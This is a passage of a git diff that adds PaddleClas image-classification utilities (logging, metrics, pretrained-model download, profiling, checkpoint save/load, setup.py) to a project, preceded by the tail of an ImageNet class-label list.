+758 reel +759 reflex camera +760 refrigerator, icebox +761 remote control, remote +762 restaurant, eating house, eating place, eatery +763 revolver, six-gun, six-shooter +764 rifle +765 rocking chair, rocker +766 rotisserie +767 rubber eraser, rubber, pencil eraser +768 rugby ball +769 rule, ruler +770 running shoe +771 safe +772 safety pin +773 saltshaker, salt shaker +774 sandal +775 sarong +776 sax, saxophone +777 scabbard +778 scale, weighing machine +779 school bus +780 schooner +781 scoreboard +782 screen, CRT screen +783 screw +784 screwdriver +785 seat belt, seatbelt +786 sewing machine +787 shield, buckler +788 shoe shop, shoe-shop, shoe store +789 shoji +790 shopping basket +791 shopping cart +792 shovel +793 shower cap +794 shower curtain +795 ski +796 ski mask +797 sleeping bag +798 slide rule, slipstick +799 sliding door +800 slot, one-armed bandit +801 snorkel +802 snowmobile +803 snowplow, snowplough +804 soap dispenser +805 soccer ball +806 sock +807 solar dish, solar collector, solar furnace +808 sombrero +809 soup bowl +810 space bar +811 space heater +812 space shuttle +813 spatula +814 speedboat +815 spider web, spider's web +816 spindle +817 sports car, sport car +818 spotlight, spot +819 stage +820 steam locomotive +821 steel arch bridge +822 steel drum +823 stethoscope +824 stole +825 stone wall +826 stopwatch, stop watch +827 stove +828 strainer +829 streetcar, tram, tramcar, trolley, trolley car +830 stretcher +831 studio couch, day bed +832 stupa, tope +833 submarine, pigboat, sub, U-boat +834 suit, suit of clothes +835 sundial +836 sunglass +837 sunglasses, dark glasses, shades +838 sunscreen, sunblock, sun blocker +839 suspension bridge +840 swab, swob, mop +841 sweatshirt +842 swimming trunks, bathing trunks +843 swing +844 switch, electric switch, electrical switch +845 syringe +846 table lamp +847 tank, army tank, armored combat vehicle, armoured combat vehicle +848 tape player +849 teapot +850 teddy, teddy bear +851 television, 
television system +852 tennis ball +853 thatch, thatched roof +854 theater curtain, theatre curtain +855 thimble +856 thresher, thrasher, threshing machine +857 throne +858 tile roof +859 toaster +860 tobacco shop, tobacconist shop, tobacconist +861 toilet seat +862 torch +863 totem pole +864 tow truck, tow car, wrecker +865 toyshop +866 tractor +867 trailer truck, tractor trailer, trucking rig, rig, articulated lorry, semi +868 tray +869 trench coat +870 tricycle, trike, velocipede +871 trimaran +872 tripod +873 triumphal arch +874 trolleybus, trolley coach, trackless trolley +875 trombone +876 tub, vat +877 turnstile +878 typewriter keyboard +879 umbrella +880 unicycle, monocycle +881 upright, upright piano +882 vacuum, vacuum cleaner +883 vase +884 vault +885 velvet +886 vending machine +887 vestment +888 viaduct +889 violin, fiddle +890 volleyball +891 waffle iron +892 wall clock +893 wallet, billfold, notecase, pocketbook +894 wardrobe, closet, press +895 warplane, military plane +896 washbasin, handbasin, washbowl, lavabo, wash-hand basin +897 washer, automatic washer, washing machine +898 water bottle +899 water jug +900 water tower +901 whiskey jug +902 whistle +903 wig +904 window screen +905 window shade +906 Windsor tie +907 wine bottle +908 wing +909 wok +910 wooden spoon +911 wool, woolen, woollen +912 worm fence, snake fence, snake-rail fence, Virginia fence +913 wreck +914 yawl +915 yurt +916 web site, website, internet site, site +917 comic book +918 crossword puzzle, crossword +919 street sign +920 traffic light, traffic signal, stoplight +921 book jacket, dust cover, dust jacket, dust wrapper +922 menu +923 plate +924 guacamole +925 consomme +926 hot pot, hotpot +927 trifle +928 ice cream, icecream +929 ice lolly, lolly, lollipop, popsicle +930 French loaf +931 bagel, beigel +932 pretzel +933 cheeseburger +934 hotdog, hot dog, red hot +935 mashed potato +936 head cabbage +937 broccoli +938 cauliflower +939 zucchini, courgette +940 spaghetti squash 
+941 acorn squash +942 butternut squash +943 cucumber, cuke +944 artichoke, globe artichoke +945 bell pepper +946 cardoon +947 mushroom +948 Granny Smith +949 strawberry +950 orange +951 lemon +952 fig +953 pineapple, ananas +954 banana +955 jackfruit, jak, jack +956 custard apple +957 pomegranate +958 hay +959 carbonara +960 chocolate sauce, chocolate syrup +961 dough +962 meat loaf, meatloaf +963 pizza, pizza pie +964 potpie +965 burrito +966 red wine +967 espresso +968 cup +969 eggnog +970 alp +971 bubble +972 cliff, drop, drop-off +973 coral reef +974 geyser +975 lakeside, lakeshore +976 promontory, headland, head, foreland +977 sandbar, sand bar +978 seashore, coast, seacoast, sea-coast +979 valley, vale +980 volcano +981 ballplayer, baseball player +982 groom, bridegroom +983 scuba diver +984 rapeseed +985 daisy +986 yellow lady's slipper, yellow lady-slipper, Cypripedium calceolus, Cypripedium parviflorum +987 corn +988 acorn +989 hip, rose hip, rosehip +990 buckeye, horse chestnut, conker +991 coral fungus +992 agaric +993 gyromitra +994 stinkhorn, carrion fungus +995 earthstar +996 hen-of-the-woods, hen of the woods, Polyporus frondosus, Grifola frondosa +997 bolete +998 ear, spike, capitulum +999 toilet tissue, toilet paper, bathroom tissue diff --git a/Smart_container/PaddleClas/ppcls/utils/logger.py b/Smart_container/PaddleClas/ppcls/utils/logger.py new file mode 100644 index 0000000..d4faaa9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/logger.py @@ -0,0 +1,137 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import sys + +import logging +import datetime +import paddle.distributed as dist + +_logger = None + + +def init_logger(name='root', log_file=None, log_level=logging.INFO): + """Initialize and get a logger by name. + If the logger has not been initialized, this method will initialize the + logger by adding one or two handlers, otherwise the initialized logger will + be directly returned. During initialization, a StreamHandler will always be + added. If `log_file` is specified a FileHandler will also be added. + Args: + name (str): Logger name. + log_file (str | None): The log filename. If specified, a FileHandler + will be added to the logger. + log_level (int): The logger level. Note that only the process of + rank 0 is affected, and other processes will set the level to + "Error" thus be silent most of the time. + Returns: + logging.Logger: The expected logger. + """ + global _logger + assert _logger is None, "logger should not be initialized twice or more." 
+ _logger = logging.getLogger(name) + + formatter = logging.Formatter( + '[%(asctime)s] %(name)s %(levelname)s: %(message)s', + datefmt="%Y/%m/%d %H:%M:%S") + + stream_handler = logging.StreamHandler(stream=sys.stdout) + stream_handler.setFormatter(formatter) + _logger.addHandler(stream_handler) + if log_file is not None and dist.get_rank() == 0: + log_file_folder = os.path.split(log_file)[0] + os.makedirs(log_file_folder, exist_ok=True) + file_handler = logging.FileHandler(log_file, 'a') + file_handler.setFormatter(formatter) + _logger.addHandler(file_handler) + if dist.get_rank() == 0: + _logger.setLevel(log_level) + else: + _logger.setLevel(logging.ERROR) + + +def log_at_trainer0(log): + """ + logs will print multi-times when calling Fleet API. + Only display single log and ignore the others. + """ + + def wrapper(fmt, *args): + if dist.get_rank() == 0: + log(fmt, *args) + + return wrapper + + +@log_at_trainer0 +def info(fmt, *args): + _logger.info(fmt, *args) + + +@log_at_trainer0 +def debug(fmt, *args): + _logger.debug(fmt, *args) + + +@log_at_trainer0 +def warning(fmt, *args): + _logger.warning(fmt, *args) + + +@log_at_trainer0 +def error(fmt, *args): + _logger.error(fmt, *args) + + +def scaler(name, value, step, writer): + """ + This function will draw a scalar curve generated by the visualdl. + Usage: Install visualdl: pip3 install visualdl==2.0.0b4 + and then: + visualdl --logdir ./scalar --host 0.0.0.0 --port 8830 + to preview loss corve in real time. + """ + if writer is None: + return + writer.add_scalar(tag=name, step=step, value=value) + + +def advertise(): + """ + Show the advertising message like the following: + + =========================================================== + == PaddleClas is powered by PaddlePaddle ! == + =========================================================== + == == + == For more info please go to the following website. 
== + == == + == https://github.com/PaddlePaddle/PaddleClas == + =========================================================== + + """ + copyright = "PaddleClas is powered by PaddlePaddle !" + ad = "For more info please go to the following website." + website = "https://github.com/PaddlePaddle/PaddleClas" + AD_LEN = 6 + len(max([copyright, ad, website], key=len)) + + info("\n{0}\n{1}\n{2}\n{3}\n{4}\n{5}\n{6}\n{7}\n".format( + "=" * (AD_LEN + 4), + "=={}==".format(copyright.center(AD_LEN)), + "=" * (AD_LEN + 4), + "=={}==".format(' ' * AD_LEN), + "=={}==".format(ad.center(AD_LEN)), + "=={}==".format(' ' * AD_LEN), + "=={}==".format(website.center(AD_LEN)), + "=" * (AD_LEN + 4), )) diff --git a/Smart_container/PaddleClas/ppcls/utils/metrics.py b/Smart_container/PaddleClas/ppcls/utils/metrics.py new file mode 100644 index 0000000..b0db68a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/metrics.py @@ -0,0 +1,107 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +from sklearn.metrics import hamming_loss +from sklearn.metrics import accuracy_score as accuracy_metric +from sklearn.metrics import multilabel_confusion_matrix +from sklearn.metrics import precision_recall_fscore_support +from sklearn.metrics import average_precision_score +from sklearn.preprocessing import binarize + +import numpy as np + +__all__ = ["multi_hot_encode", "hamming_distance", "accuracy_score", "precision_recall_fscore", "mean_average_precision"] + + +def multi_hot_encode(logits, threshold=0.5): + """ + Encode logits to multi-hot by elementwise for multilabel + """ + + return binarize(logits, threshold=threshold) + + +def hamming_distance(output, target): + """ + Soft metric based label for multilabel classification + Returns: + The smaller the return value is, the better model is. + """ + + return hamming_loss(target, output) + + +def accuracy_score(output, target, base="sample"): + """ + Hard metric for multilabel classification + Args: + output: + target: + base: ["sample", "label"], default="sample" + if "sample", return metric score based sample, + if "label", return metric score based label. 
+ Returns: + accuracy: + """ + + assert base in ["sample", "label"], 'must be one of ["sample", "label"]' + + if base == "sample": + accuracy = accuracy_metric(target, output) + elif base == "label": + mcm = multilabel_confusion_matrix(target, output) + tns = mcm[:, 0, 0] + fns = mcm[:, 1, 0] + tps = mcm[:, 1, 1] + fps = mcm[:, 0, 1] + + accuracy = (sum(tps) + sum(tns)) / (sum(tps) + sum(tns) + sum(fns) + sum(fps)) + + return accuracy + + +def precision_recall_fscore(output, target): + """ + Metric based label for multilabel classification + Returns: + precisions: + recalls: + fscores: + """ + + precisions, recalls, fscores, _ = precision_recall_fscore_support(target, output) + + return precisions, recalls, fscores + + +def mean_average_precision(logits, target): + """ + Calculate average precision + Args: + logits: probability from network before sigmoid or softmax + target: ground truth, 0 or 1 + """ + if not (isinstance(logits, np.ndarray) and isinstance(target, np.ndarray)): + raise TypeError("logits and target should be np.ndarray.") + + aps = [] + for i in range(target.shape[1]): + ap = average_precision_score(target[:, i], logits[:, i]) + aps.append(ap) + + return np.mean(aps) diff --git a/Smart_container/PaddleClas/ppcls/utils/misc.py b/Smart_container/PaddleClas/ppcls/utils/misc.py new file mode 100644 index 0000000..90dc47e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/misc.py @@ -0,0 +1,62 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +__all__ = ['AverageMeter'] + + +class AverageMeter(object): + """ + Computes and stores the average and current value + """ + + def __init__(self, name='', fmt='f', postfix="", need_avg=True): + self.name = name + self.fmt = fmt + self.postfix = postfix + self.need_avg = need_avg + self.reset() + + def reset(self): + """ reset """ + self.val = 0 + self.avg = 0 + self.sum = 0 + self.count = 0 + + def update(self, val, n=1): + """ update """ + self.val = val + self.sum += val * n + self.count += n + self.avg = self.sum / self.count + + @property + def total(self): + return '{self.name}_sum: {self.sum:{self.fmt}}{self.postfix}'.format( + self=self) + + @property + def total_minute(self): + return '{self.name} {s:{self.fmt}}{self.postfix} min'.format( + s=self.sum / 60, self=self) + + @property + def mean(self): + return '{self.name}: {self.avg:{self.fmt}}{self.postfix}'.format( + self=self) if self.need_avg else '' + + @property + def value(self): + return '{self.name}: {self.val:{self.fmt}}{self.postfix}'.format( + self=self) diff --git a/Smart_container/PaddleClas/ppcls/utils/model_zoo.py b/Smart_container/PaddleClas/ppcls/utils/model_zoo.py new file mode 100644 index 0000000..fc527f6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/model_zoo.py @@ -0,0 +1,213 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import requests +import shutil +import tarfile +import tqdm +import zipfile + +from ppcls.arch import similar_architectures +from ppcls.utils import logger + +__all__ = ['get'] + +DOWNLOAD_RETRY_LIMIT = 3 + + +class UrlError(Exception): + """ UrlError + """ + + def __init__(self, url='', code=''): + message = "Downloading from {} failed with code {}!".format(url, code) + super(UrlError, self).__init__(message) + + +class ModelNameError(Exception): + """ ModelNameError + """ + + def __init__(self, message=''): + super(ModelNameError, self).__init__(message) + + +class RetryError(Exception): + """ RetryError + """ + + def __init__(self, url='', times=''): + message = "Download from {} failed. Retry({}) limit reached".format( + url, times) + super(RetryError, self).__init__(message) + + +def _get_url(architecture, postfix="pdparams"): + prefix = "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/" + fname = architecture + "_pretrained." + postfix + return prefix + fname + + +def _move_and_merge_tree(src, dst): + """ + Move src directory to dst, if dst is already exists, + merge src to dst + """ + if not os.path.exists(dst): + shutil.move(src, dst) + elif os.path.isfile(src): + shutil.move(src, dst) + else: + for fp in os.listdir(src): + src_fp = os.path.join(src, fp) + dst_fp = os.path.join(dst, fp) + if os.path.isdir(src_fp): + if os.path.isdir(dst_fp): + _move_and_merge_tree(src_fp, dst_fp) + else: + shutil.move(src_fp, dst_fp) + elif os.path.isfile(src_fp) and \ + not os.path.isfile(dst_fp): + shutil.move(src_fp, dst_fp) + + +def _download(url, path): + """ + Download from url, save to path. 
+ url (str): download url + path (str): download to given path + """ + if not os.path.exists(path): + os.makedirs(path) + + fname = os.path.split(url)[-1] + fullname = os.path.join(path, fname) + retry_cnt = 0 + + while not os.path.exists(fullname): + if retry_cnt < DOWNLOAD_RETRY_LIMIT: + retry_cnt += 1 + else: + raise RetryError(url, DOWNLOAD_RETRY_LIMIT) + + logger.info("Downloading {} from {}".format(fname, url)) + + req = requests.get(url, stream=True) + if req.status_code != 200: + raise UrlError(url, req.status_code) + + # For protecting download interrupted, download to + # tmp_fullname firstly, move tmp_fullname to fullname + # after download finished + tmp_fullname = fullname + "_tmp" + total_size = req.headers.get('content-length') + with open(tmp_fullname, 'wb') as f: + if total_size: + for chunk in tqdm.tqdm( + req.iter_content(chunk_size=1024), + total=(int(total_size) + 1023) // 1024, + unit='KB'): + f.write(chunk) + else: + for chunk in req.iter_content(chunk_size=1024): + if chunk: + f.write(chunk) + shutil.move(tmp_fullname, fullname) + + return fullname + + +def _decompress(fname): + """ + Decompress for zip and tar file + """ + logger.info("Decompressing {}...".format(fname)) + + # For protecting decompressing interrupted, + # decompress to fpath_tmp directory firstly, if decompress + # succeeded, move decompress files to fpath and delete + # fpath_tmp and remove download compress file. 
+ fpath = os.path.split(fname)[0] + fpath_tmp = os.path.join(fpath, 'tmp') + if os.path.isdir(fpath_tmp): + shutil.rmtree(fpath_tmp) + os.makedirs(fpath_tmp) + + if fname.find('tar') >= 0: + with tarfile.open(fname) as tf: + tf.extractall(path=fpath_tmp) + elif fname.find('zip') >= 0: + with zipfile.ZipFile(fname) as zf: + zf.extractall(path=fpath_tmp) + else: + raise TypeError("Unsupport compress file type {}".format(fname)) + + fs = os.listdir(fpath_tmp) + assert len( + fs + ) == 1, "There should just be 1 pretrained path in an archive file but got {}.".format( + len(fs)) + + f = fs[0] + src_dir = os.path.join(fpath_tmp, f) + dst_dir = os.path.join(fpath, f) + _move_and_merge_tree(src_dir, dst_dir) + + shutil.rmtree(fpath_tmp) + os.remove(fname) + + return f + + +def _get_pretrained(): + with open('./ppcls/utils/pretrained.list') as flist: + pretrained = [line.strip() for line in flist] + return pretrained + + +def _check_pretrained_name(architecture): + assert isinstance(architecture, str), \ + ("the type of architecture({}) should be str". format(architecture)) + pretrained = _get_pretrained() + similar_names = similar_architectures(architecture, pretrained) + model_list = ', '.join(similar_names) + err = "{} is not exist! Maybe you want: [{}]" \ + "".format(architecture, model_list) + if architecture not in similar_names: + raise ModelNameError(err) + + +def list_models(): + pretrained = _get_pretrained() + msg = "All avialable pretrained models are as follows: {}".format( + pretrained) + logger.info(msg) + return + + +def get(architecture, path, decompress=False, postfix="pdparams"): + """ + Get the pretrained model. 
+ """ + _check_pretrained_name(architecture) + url = _get_url(architecture, postfix=postfix) + fname = _download(url, path) + if postfix == "tar" and decompress: + _decompress(fname) + logger.info("download {} finished ".format(fname)) diff --git a/Smart_container/PaddleClas/ppcls/utils/pretrained.list b/Smart_container/PaddleClas/ppcls/utils/pretrained.list new file mode 100644 index 0000000..36d70f5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/pretrained.list @@ -0,0 +1,121 @@ +ResNet18 +ResNet34 +ResNet50 +ResNet101 +ResNet152 +ResNet50_vc +ResNet18_vd +ResNet34_vd +ResNet50_vd +ResNet50_vd_v2 +ResNet101_vd +ResNet152_vd +ResNet200_vd +ResNet50_vd_ssld +ResNet50_vd_ssld_v2 +Fix_ResNet50_vd_ssld_v2 +ResNet101_vd_ssld +MobileNetV3_large_x0_35 +MobileNetV3_large_x0_5 +MobileNetV3_large_x0_75 +MobileNetV3_large_x1_0 +MobileNetV3_large_x1_25 +MobileNetV3_small_x0_35 +MobileNetV3_small_x0_5 +MobileNetV3_small_x0_75 +MobileNetV3_small_x1_0 +MobileNetV3_small_x1_25 +MobileNetV3_large_x1_0_ssld +MobileNetV3_large_x1_0_ssld_int8 +MobileNetV3_small_x1_0_ssld +MobileNetV2_x0_25 +MobileNetV2_x0_5 +MobileNetV2_x0_75 +MobileNetV2 +MobileNetV2_x1_5 +MobileNetV2_x2_0 +MobileNetV2_ssld +MobileNetV1_x0_25 +MobileNetV1_x0_5 +MobileNetV1_x0_75 +MobileNetV1 +MobileNetV1_ssld +ShuffleNetV2_x0_25 +ShuffleNetV2_x0_33 +ShuffleNetV2_x0_5 +ShuffleNetV2 +ShuffleNetV2_x1_5 +ShuffleNetV2_x2_0 +ShuffleNetV2_swish +ResNeXt50_32x4d +ResNeXt50_64x4d +ResNeXt101_32x4d +ResNeXt101_64x4d +ResNeXt152_32x4d +ResNeXt152_64x4d +ResNeXt50_vd_32x4d +ResNeXt50_vd_64x4d +ResNeXt101_vd_32x4d +ResNeXt101_vd_64x4d +ResNeXt152_vd_32x4d +ResNeXt152_vd_64x4d +SE_ResNet18_vd +SE_ResNet34_vd +SE_ResNet50_vd +SE_ResNeXt50_32x4d +SE_ResNeXt101_32x4d +SE_ResNeXt50_vd_32x4d +SENet154_vd +Res2Net50_26w_4s +Res2Net50_vd_26w_4s +Res2Net50_14w_8s +Res2Net101_vd_26w_4s +Res2Net200_vd_26w_4s +GoogLeNet +InceptionV4 +Xception41 +Xception41_deeplab +Xception65 +Xception65_deeplab +Xception71 +HRNet_W18_C 
+HRNet_W30_C +HRNet_W32_C +HRNet_W40_C +HRNet_W44_C +HRNet_W48_C +HRNet_W64_C +DPN68 +DPN92 +DPN98 +DPN107 +DPN131 +DenseNet121 +DenseNet161 +DenseNet169 +DenseNet201 +DenseNet264 +EfficientNetB0_small +EfficientNetB0 +EfficientNetB1 +EfficientNetB2 +EfficientNetB3 +EfficientNetB4 +EfficientNetB5 +EfficientNetB6 +EfficientNetB7 +ResNeXt101_32x8d_wsl +ResNeXt101_32x16d_wsl +ResNeXt101_32x32d_wsl +ResNeXt101_32x48d_wsl +Fix_ResNeXt101_32x48d_wsl +AlexNet +SqueezeNet1_0 +SqueezeNet1_1 +VGG11 +VGG13 +VGG16 +VGG19 +DarkNet53_ImageNet1k +ResNet50_ACNet_deploy +CSPResNet50_leaky diff --git a/Smart_container/PaddleClas/ppcls/utils/profiler.py b/Smart_container/PaddleClas/ppcls/utils/profiler.py new file mode 100644 index 0000000..7cf945a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/profiler.py @@ -0,0 +1,111 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import sys +import paddle + +# A global variable to record the number of calling times for profiler +# functions. It is used to specify the tracing range of training steps. +_profiler_step_id = 0 + +# A global variable to avoid parsing from string every time. +_profiler_options = None + + +class ProfilerOptions(object): + ''' + Use a string to initialize a ProfilerOptions. + The string should be in the format: "key1=value1;key2=value;key3=value3". 
+ For example: + "profile_path=model.profile" + "batch_range=[50, 60]; profile_path=model.profile" + "batch_range=[50, 60]; tracer_option=OpDetail; profile_path=model.profile" + + ProfilerOptions supports following key-value pair: + batch_range - an integer list, e.g. [100, 110]. + state - a string, the optional values are 'CPU', 'GPU' or 'All'. + sorted_key - a string, the optional values are 'calls', 'total', + 'max', 'min' or 'ave'. + tracer_option - a string, the optional values are 'Default', 'OpDetail', + 'AllOpDetail'. + profile_path - a string, the path to save the serialized profile data, + which can be used to generate a timeline. + exit_on_finished - a boolean. + ''' + + def __init__(self, options_str): + assert isinstance(options_str, str) + + self._options = { + 'batch_range': [10, 20], + 'state': 'All', + 'sorted_key': 'total', + 'tracer_option': 'Default', + 'profile_path': '/tmp/profile', + 'exit_on_finished': True + } + self._parse_from_string(options_str) + + def _parse_from_string(self, options_str): + for kv in options_str.replace(' ', '').split(';'): + key, value = kv.split('=') + if key == 'batch_range': + value_list = value.replace('[', '').replace(']', '').split(',') + value_list = list(map(int, value_list)) + if len(value_list) >= 2 and value_list[0] >= 0 and value_list[ + 1] > value_list[0]: + self._options[key] = value_list + elif key == 'exit_on_finished': + self._options[key] = value.lower() in ("yes", "true", "t", "1") + elif key in [ + 'state', 'sorted_key', 'tracer_option', 'profile_path' + ]: + self._options[key] = value + + def __getitem__(self, name): + if self._options.get(name, None) is None: + raise ValueError( + "ProfilerOptions does not have an option named %s." % name) + return self._options[name]
+ One call of this function is treated as a profiler step. + + Args: + profiler_options - a string to initialize the ProfilerOptions. + Default is None, and the profiler is disabled. + ''' + if options_str is None: + return + + global _profiler_step_id + global _profiler_options + + if _profiler_options is None: + _profiler_options = ProfilerOptions(options_str) + + if _profiler_step_id == _profiler_options['batch_range'][0]: + paddle.utils.profiler.start_profiler( + _profiler_options['state'], _profiler_options['tracer_option']) + elif _profiler_step_id == _profiler_options['batch_range'][1]: + paddle.utils.profiler.stop_profiler(_profiler_options['sorted_key'], + _profiler_options['profile_path']) + if _profiler_options['exit_on_finished']: + sys.exit(0) + + _profiler_step_id += 1 diff --git a/Smart_container/PaddleClas/ppcls/utils/save_load.py b/Smart_container/PaddleClas/ppcls/utils/save_load.py new file mode 100644 index 0000000..625a284 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/save_load.py @@ -0,0 +1,136 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import errno +import os +import re +import shutil +import tempfile + +import paddle +from ppcls.utils import logger +from .download import get_weights_path_from_url + +__all__ = ['init_model', 'save_model', 'load_dygraph_pretrain'] + + +def _mkdir_if_not_exist(path): + """ + mkdir if not exists, ignore the exception when multiprocess mkdir together + """ + if not os.path.exists(path): + try: + os.makedirs(path) + except OSError as e: + if e.errno == errno.EEXIST and os.path.isdir(path): + logger.warning( + 'be happy if some process has already created {}'.format( + path)) + else: + raise OSError('Failed to mkdir {}'.format(path)) + + +def load_dygraph_pretrain(model, path=None): + if not (os.path.isdir(path) or os.path.exists(path + '.pdparams')): + raise ValueError("Model pretrain path {} does not " + "exists.".format(path)) + param_state_dict = paddle.load(path + ".pdparams") + model.set_dict(param_state_dict) + return + + +def load_dygraph_pretrain_from_url(model, pretrained_url, use_ssld=False): + if use_ssld: + pretrained_url = pretrained_url.replace("_pretrained", + "_ssld_pretrained") + local_weight_path = get_weights_path_from_url(pretrained_url).replace( + ".pdparams", "") + load_dygraph_pretrain(model, path=local_weight_path) + return + + +def load_distillation_model(model, pretrained_model): + logger.info("In distillation mode, teacher model will be " + "loaded firstly before student model.") + + if not isinstance(pretrained_model, list): + pretrained_model = [pretrained_model] + + teacher = model.teacher if hasattr(model, + "teacher") else model._layers.teacher + student = model.student if hasattr(model, + "student") else model._layers.student + load_dygraph_pretrain(teacher, path=pretrained_model[0]) + logger.info("Finish initing teacher model from {}".format( + pretrained_model)) + # load student model + if len(pretrained_model) >= 2: + 
load_dygraph_pretrain(student, path=pretrained_model[1]) + logger.info("Finish initing student model from {}".format( + pretrained_model)) + + +def init_model(config, net, optimizer=None): + """ + load model from checkpoint or pretrained_model + """ + checkpoints = config.get('checkpoints') + if checkpoints and optimizer is not None: + assert os.path.exists(checkpoints + ".pdparams"), \ + "Given dir {}.pdparams not exist.".format(checkpoints) + assert os.path.exists(checkpoints + ".pdopt"), \ + "Given dir {}.pdopt not exist.".format(checkpoints) + para_dict = paddle.load(checkpoints + ".pdparams") + opti_dict = paddle.load(checkpoints + ".pdopt") + metric_dict = paddle.load(checkpoints + ".pdstates") + net.set_dict(para_dict) + optimizer.set_state_dict(opti_dict) + logger.info("Finish load checkpoints from {}".format(checkpoints)) + return metric_dict + + pretrained_model = config.get('pretrained_model') + use_distillation = config.get('use_distillation', False) + if pretrained_model: + if use_distillation: + load_distillation_model(net, pretrained_model) + else: # common load + load_dygraph_pretrain(net, path=pretrained_model) + logger.info( + logger.coloring("Finish load pretrained model from {}".format( + pretrained_model), "HEADER")) + + +def save_model(net, + optimizer, + metric_info, + model_path, + model_name="", + prefix='ppcls'): + """ + save model to the target path + """ + if paddle.distributed.get_rank() != 0: + return + model_path = os.path.join(model_path, model_name) + _mkdir_if_not_exist(model_path) + model_path = os.path.join(model_path, prefix) + + paddle.save(net.state_dict(), model_path + ".pdparams") + paddle.save(optimizer.state_dict(), model_path + ".pdopt") + paddle.save(metric_info, model_path + ".pdstates") + logger.info("Already save model in {}".format(model_path)) diff --git a/Smart_container/PaddleClas/setup.py b/Smart_container/PaddleClas/setup.py new file mode 100644 index 0000000..a17e77d --- /dev/null +++ 
b/Smart_container/PaddleClas/setup.py @@ -0,0 +1,58 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from io import open +from setuptools import setup + +with open('requirements.txt', encoding="utf-8-sig") as f: + requirements = f.readlines() + + +def readme(): + with open('docs/en/whl_en.md', encoding="utf-8-sig") as f: + README = f.read() + return README + + +setup( + name='paddleclas', + packages=['paddleclas'], + package_dir={'paddleclas': ''}, + include_package_data=True, + entry_points={ + "console_scripts": ["paddleclas= paddleclas.paddleclas:main"] + }, + version='0.0.0', + install_requires=requirements, + license='Apache License 2.0', + description='Awesome Image Classification toolkits based on PaddlePaddle ', + long_description=readme(), + long_description_content_type='text/markdown', + url='https://github.com/PaddlePaddle/PaddleClas', + download_url='https://github.com/PaddlePaddle/PaddleClas.git', + keywords=[ + 'A treasure chest for image classification powered by PaddlePaddle.' 
